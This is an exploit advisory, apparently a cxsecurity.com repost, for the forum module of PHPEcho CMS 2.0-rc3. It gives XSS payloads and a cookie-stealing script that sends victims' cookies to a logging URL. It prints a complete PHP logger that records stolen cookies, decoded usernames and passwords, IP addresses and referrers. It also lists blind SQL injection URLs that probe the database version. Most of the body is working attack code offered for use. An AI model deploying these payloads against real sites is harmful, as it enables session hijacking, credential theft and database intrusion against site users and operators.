PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability

2009.07.11
Credit: JosS
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-79
CWE-89

PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - download: http://sourceforge.net/project/showfiles.php?group_id=186100 ~ [XSS] The forum allowed insert javascript code and html code. PoC: "><h1>0wned</h1> "><script>alert("JosS b0x");</script> ----------- Cookie Stealing: <script>window.location=&#65533;http://127.0.0.1/stealing.php?cookie=&#65533;+document.cookie</script> stealing.php <?php $archivo = fopen('log.htm','a'); $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>'); fclose($archivo); ?> ~ [BLIND] PoC: /index.php?module=forum&show=thread&id=1 and 1=2 [False] /index.php?module=forum&show=thread&id=1 and 1=1 [True] /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5 /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4 __h0__

References:

http://xforce.iss.net/xforce/xfdb/51360
http://www.securityfocus.com/bid/35488
http://www.milw0rm.com/exploits/9014


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top